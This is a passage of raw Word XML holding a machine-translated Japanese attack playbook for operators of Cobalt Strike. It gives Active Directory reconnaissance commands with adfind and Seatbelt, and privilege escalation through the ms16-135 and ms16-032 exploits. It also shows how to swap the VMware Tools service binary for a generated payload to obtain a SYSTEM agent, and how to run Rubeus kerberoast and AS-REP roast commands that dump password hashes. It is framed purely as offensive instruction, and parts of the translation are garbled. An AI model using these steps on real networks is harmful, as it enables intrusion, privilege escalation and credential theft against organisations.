      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=subnet)&gt; subnets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D526203" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>adfind.exe -f "(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>objectcategory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=group)" &gt; ad_group.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C870FC5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>adfind.exe -gcb -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>trustdmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; trustdmp.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3474A3A7" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B70226" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>-シートベルトで現車の情報を集めよう-!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA6CC1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>アセンブリの実行/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cobalt_strike_extension_kit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/exe/シートベルト.exe -group=all -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outputfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="C:\ProgramData\textinfo.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B192E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>(ここでは説明しませんが、チェックの数はまともであり、収集されたすべての情報はローカルマシンとネットワークの両方で多かれ少なかれ重要です)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D51D74D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="17BD536E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="55366E1D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---------------------------------------------特権昇格の手法-----------------------------------------------!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242B2F7F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="27C9D043" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---エクスプロイトの使用---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04476BDE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - システムに関する情報を取得します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4301C8BD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">受信した </w:t>
      </w:r>
      <w:r>
        <w:t>情報は、テキストファイル(win10-systeminfo.txt)に書き込む必要があります</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367ED121" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve"> Windows-Exploit-Suggester を使用すると、使用するエクスプロイトがおおよそ表示されます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A29A9FE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---エクスプロイトデータベースの更新---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B484B" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>/windows-exploit-suggester.py --update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC148FB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>[*] 開始中...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B196FAB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>[*] 正常に要求されたベース URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DDCC96" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>[*]スクレイピングされたMSダウンロードURL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFE6BB0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>[+] ファイルへの書き込み 2021-03-09-mssb.xls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07760693" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>[*]完了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E6DB64" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---エクスプロイトを検出するプログラムの実行---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147B68B1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>./windows-exploit-suggester.py --database 2021-03-09-mssb.xls --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> win10-systeminfoです.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6C0E37" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="156A2B80" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次に</w:t>
      </w:r>
      <w:r>
        <w:t>、Windows-Exploit-Suggesterが提供するエクスプロイトのリストに従って、マシンに適用します。(ただし、最初に、使用したいエクスプロイトについて読むことをお勧めします、それはあなたの目的に合わないかもしれません、OSのバージョンとその動作に特別な注意を払ってください。たとえば、グループ</w:t>
      </w:r>
      <w:r>
        <w:t>のメンバーになりたい場合、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251386F9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次に例を示します</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792DBE25" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>オプション1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE47A6A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>elevate ms16-135 [listener] - このコマンドはエクスプロイト ms16-135 を使用し、成功すると SYSTEM の下から新しいセッションを呼び出します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3920C7" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="5CAB5E43" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>オプション2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354C26BA" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>たとえば</w:t>
      </w:r>
      <w:r>
        <w:t>、このディレクトリ C:\Users\User1\Pictures に移動しましょう (ロードできる限り、他のディレクトリに移動できます)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4576871C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ロードアーティファクトをアップロードする.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exe|dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>|ワンライナー</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2A1955" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runasadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ms16-032 (ディレクトリを指定)artifact.exe [必要に応じてオプション]コマンドは、エクスプロイトms16-032を使用して、SYSTEMの下からロードを実行します。この場合、SYSTEMの下から新しいエージェントを受け取ります。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1ABBC1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="45A1A7EA" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---シャープアップ---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B39CD0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SharpUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> は、特権昇格のための設定ミス スキャナーです。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3693CB7A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>スキャニング：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1E115" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>アセンブリの実行/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cobalt_strike_extension_kit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/exe/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SharpUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> にあります.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0054D3B3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>結論の例(多分あなたは何も見つけられないでしょう):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514A312D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="264D5934" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">=== </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SharpUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 特権エスカレーション チェックの実行 ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0063D731" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="1143283A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>===編集可能なサービス===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586B001A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>名前</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>VMツール</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEFD526" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>表示名</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>:ヴイエムウェア</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 道具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0C77A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>説明</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">:P </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rovides</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ホストと Qwest オペレーションシステム間でのオブジェクトの同期のサポート。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168187C3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>状態</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>：停止</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024201A9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>スタートモード</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>：自動</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39465E40" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>パス</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>:C:\プログラム</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ファイル\VMware\VMware Tools\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vmtoolsd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B9A9D62" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>=== 編集可能なバイナリサービス ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5594AB2A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="4377600C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">=== </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AlwaysInstallElevated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> レジストリ キー ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC7484" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="53FEC2B8" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>=== %PATH%内の変更可能なフォルダ ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F80F3B8" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="4112C2BE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>===変更可能なレジストリの自動実行===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C5D841" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="4C05F84D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>=== *特別* ユーザー権限 ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C136EC7" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="308D82BD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>===無人インストールファイル===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD5A36" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="29DAA362" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>=== マカフィー サイトリスト.xml ファイル ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BAB14E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="6C30DAD8" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>=== キャッシュされた GPP パスワード ===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294884AF" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="5E16FCEC" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ユーザーがロードを開始するために</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VMtools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>サービスを変更できる</w:t>
      </w:r>
      <w:r>
        <w:t>ことがわかります。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F1D149" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">攻撃] に移動します --&gt;  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WindowsExecutable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (S) --&gt; [リスナー] を選択し、Windows サービス EXE を出力します --&gt; 生成 --&gt;ファイル名:vmtoolsd.exe --&gt; 保存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F6B869" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>次に</w:t>
      </w:r>
      <w:r>
        <w:t>、任意のディレクトリ(C:\ Users \ User1 \ Picturesなど)に移動して、ロードをロードします。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710D5448" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">次に </w:t>
      </w:r>
      <w:r>
        <w:t>、サービスを変更しましょう。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27673A95" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> config </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vmtoolsd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>binpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=C:\Users\User1\Pictures\vmtoolsd.exe を実行します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3F2A3D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>起動 VMToolsd.exe を実行します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18444446" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">その後 </w:t>
      </w:r>
      <w:r>
        <w:t>、SYSTEMのエージェントが到着します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFBEA4E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="145860A5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="1D805729" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="5F9C82BB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>------------------------------------------ハッシュとパスワードの取得------------------------------------------------!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12501AAD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="261C110D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>(権限なしでも実行可能)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC6EE06" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>----</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 攻撃 - メモリ下からハッシュを取得します---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A62EE6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="49621BC6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 攻撃</w:t>
      </w:r>
      <w:r>
        <w:t>を実行します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D05C43" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>アセンブリの実行/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cobalt_strike_extension_kit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/exe/Rubeus.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldapfilter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admincount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1' /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>format:hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outfile:C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProgramData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B704E4D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>アセンブリの実行/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cobalt_strike_extension_kit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/exe/Rubeus.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asreproast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>format:hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outfile:C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
